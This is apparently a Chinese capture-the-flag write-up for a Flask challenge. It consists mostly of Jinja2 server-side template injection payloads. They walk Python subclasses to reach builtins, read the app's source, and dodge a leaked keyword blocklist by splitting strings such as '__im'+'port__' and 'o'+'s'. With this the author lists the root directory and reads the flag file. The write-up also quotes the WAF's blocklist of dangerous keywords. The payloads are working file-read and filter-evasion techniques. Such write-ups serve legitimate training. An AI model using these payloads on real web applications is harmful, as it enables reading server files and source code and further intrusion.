FlaskApp
遍历找利用类读取文件(写成payload时要删除换行):
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__=='catch_warnings' %}
{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}
{% endif %}
{% endfor %}
或者写个py脚本遍历也是可以的,不过很花时间:
{{[].__class__.__base__.__subclasses__()[%s].__name__}}
拿到WAF:
def waf(str):
black_list = ['flag', 'os', 'system', 'popen', 'import', 'eval', 'chr', 'request', 'subprocess', 'commands', 'socket', 'hex', 'base64', '*', '?']
for x in black_list:
if x in str.lower():
return 1
遍历目录:遍历目录存在函数listdir()。
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__=='catch_warnings' %}
{{ c.__init__.__globals__['__builtins__']['__im'+'port__']('o'+'s').listdir('/')}}
{% endif %}
{% endfor %}
拿到目录
['bin', 'boot', 'dev', 'etc', 'home', 'lib', 'lib64', 'media', 'mnt', 'opt', 'proc', 'root', 'run', 'sbin', 'srv', 'sys', 'tmp', 'usr', 'var', 'this_is_the_flag.txt', '.dockerenv', 'app']
读取this_is_the_flag.txt文件。
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/this_is_the_fl'+'ag.txt','r').read() }}{% endif %}{% endfor %}
Last modified 8mo ago